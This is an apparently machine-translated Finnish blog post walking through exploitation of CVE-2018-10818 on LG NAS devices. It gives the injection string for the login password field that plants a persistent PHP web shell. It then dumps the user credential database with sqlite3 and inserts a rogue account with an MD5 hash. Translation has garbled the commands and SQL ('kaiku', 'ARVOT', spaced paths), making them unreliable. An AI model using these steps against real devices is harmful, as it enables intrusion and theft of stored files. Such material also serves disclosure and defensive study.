Suurin osa LG NAS -laitteista löytyi kriittinen haavoittuvuus


Yleiskatsaus:

Teimme kattavan arvioinnin LG NAS -laitteesta. Tämä laite on verkkoon kytketty tallennuslaite, joka sallii vain valtuutettujen käyttäjien. Se on kuin yksityinen pilvi, vain se maksaa vähemmän, on helppo käyttää ja antaa sinulle täydellisen hallinnan. kuitenkin, löysimme tavan tunkeutua järjestelmään käyttämällä ennalta todennettua etäkomentojen injektioheikkoutta (CVE-2018-10818), jonka avulla voimme sitten tehdä käytännössä kaiken, mukaan lukien pääsyn tietoihin ja käyttäjän tietojen ja sisällön peukaloinnin.. 

hyväksikäyttö:

Haavoittuvuus (CVE-2018-10818) on ennalta todentamista edeltävä etäkomennon injektioheikkous, joka löytyy suurimmasta osasta LG NAS -laitteita.

Kuten videossa näytetään, et voi yksinkertaisesti kirjautua sisään millään satunnaisilla käyttäjänimillä ja salasanoilla. "Salasana" -parametrissa on kuitenkin komentojen injektioheikkous (sinun on käytettävä sieppainta, kuten burp). Voimme yksinkertaisesti laukaista tämän virheen lisäämällä siihen. Voit lisätä uuden käyttäjän kirjoittamalla pysyvän kuoren nimeltä c.php käyttämällä:
; kaiku ”” > / tmp / x2; sudo mv / tmp / x2 /var/www/c.php
Jos syötät sen salasanana, se hyödyntää haavoittuvuutta.

Sitten, ohittamalla seuraava komento, voimme "jättää" käyttäjät:
echo “.dump user” | sqlite3 /etc/nas/db/share.db
Polkumyynti tarkoittaa kaikkien tietokantatietojen lukemista. Hylkäämme tietokannan, jotta näemme käyttäjien käyttäjätunnukset ja salasanat. Tämän avulla voimme myös lisätä oman.

Jotta voimme lisätä uuden käyttäjän tietokantaan, meidän on luotava kelvollinen MD5. Voimme käyttää mukana toimitettua MD5-työkalua hash-käyttäjänimiä "test" ja salasanan "1234" avulla.
sudo nas-common md5 1234
Kun meillä on kelvollinen salasana ja käyttäjänimi, voimme lisätä sen tietokantaan seuraavilla:
INSERT IN 'user' ARVOT ('test', 'md5_hash', 'Vuln Test', 'test @ localhost', '');
Kun tämä on valmis, voimme kirjautua sisään LG: n verkkovarastoon käyttäjätunnuksella ja salasanalla 1234.

Tämä antaa meille pääsyn järjestelmään valtuutettuna käyttäjänä. Täältä voimme käyttää kaikkia tietoja tai luokiteltuja tiedostoja, jotka on tallennettu LAS-laitteeseen.

suositukset:

  • Huomaa, että LAS-laitteita voidaan hakkeroida ja hyödyntää.
  • Ota yhteyttä LG: hen ja kerro heille tästä haavoittuvuudesta ja pyydä heitä korjaamaan se.
  • Varoita ystäviäsi facebookissa (tässä linkki) tai twitterissä (napsauta twiittiä)
Brayan Jackson
Brayan Jackson Administrator
Sorry! The Author has not filled his profile.
follow me